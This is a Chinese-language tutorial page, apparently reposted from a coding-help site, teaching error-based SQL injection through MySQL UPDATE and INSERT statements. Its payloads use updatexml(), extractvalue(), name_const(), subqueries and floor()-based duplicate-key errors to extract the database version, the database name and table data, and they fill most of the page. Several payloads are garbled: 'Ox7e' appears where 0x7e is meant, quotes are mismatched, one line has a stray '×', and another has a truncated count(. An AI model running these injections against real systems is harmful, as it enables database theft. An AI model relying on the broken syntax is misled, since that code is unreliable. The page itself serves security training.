Java教程

SQL注入Update注入

本文主要是介绍SQL注入Update注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

1. MySQL中的update函数

如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。
UPDATE table SET column=mew_value WHERE column= value
为lastname 是"Wilson”的人添加firstname :
UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’
在这里插入图片描述
更新某一行中的若干列
UPDATE table SET column1=mew_value1, column2=mew_value2 WHEREcolumn= value
我们会修改地址( address ) ,并添加城市名称( city ) :
UPDATE Person SET Address = ‘Zhongshan 23’, City = 'Nanjing’WHERELastName = ‘Wilson’
在这里插入图片描述

2. SQL注入Update的利用

2.1 注入语法

因为我们这里是用的显错模式,所以思路就是在insert、update、delete语句中人为构造语法错误,利用如下语句∶
insert into users (id,username, password) values (2, “inject here” ; ‘Olivia’);
insert into users (id, username, password) values (2,"“inject here”", ‘Olivia’);
在这里插入图片描述

2.2 利用updatexml()获取数据

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
获取数据库版本信息
UPDATE users SET password=‘Nicky’ or updatexml(2,concat(Ox7e,(version())),0)or"“WHERE id=2 and username='Olivia”;
在这里插入图片描述
利用Update获取user表的数据
在这里插入图片描述

2.3 利用extractvalue()获取数据

extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数。
获取数据库名
UPDATE users SET password=‘Nicky’ or extractvalue(1,concat(Ox7e,database()))or"" WHERE id=2 and username= 'Nervo;
在这里插入图片描述
可以用insert、update、delete语句获取到数据库表名、列名,但是不能用update获取当前表的数据。

2.4 利用name_const()获取数据

name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时,NAME_CONST()促使该列使用给定名称。
获取数据库版本信息
UPDATE users SET password=‘Nicky’ or (SELECT * FROM
(SELECT(name_const(version(),1)),name_const(version(),1))a) or " WHERE id=2and username= ‘Nervo’;
在这里插入图片描述

2.5 利用子查询注入

原理与select查询时的显错注入一致。
查询数据库名
UPDATE users SET password=‘Nicky’ or (SELECT 1 FROM(SELECT
count(*),concat((SELECT(SELECT concat(Ox7e,0x27,cast(database() as
char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))×FROM information_schema.columns group by x)a)or" WHERE id=2 and
username=‘Nervo’;
在这里插入图片描述

2.6 利用floor()函数注入

原理是利用了主键的唯一性,通过floor(rand(0)*2)随机产生0和1以及group by重复获取floor(rand(0)2),制造主键重复,从而报错
获取数据库版本信息
UPDATE users SET password=‘Nicky’ or (select 1 from (select
count(
),concat(version(),0x23,floor(rand(0)*2))x from information_schema.tablesgroup by x)a) or " WHERE id=2 and username =‘Nervo’;
在这里插入图片描述
文章参考哔哩哔哩奇安信网络安全培训视频

这篇关于SQL注入Update注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!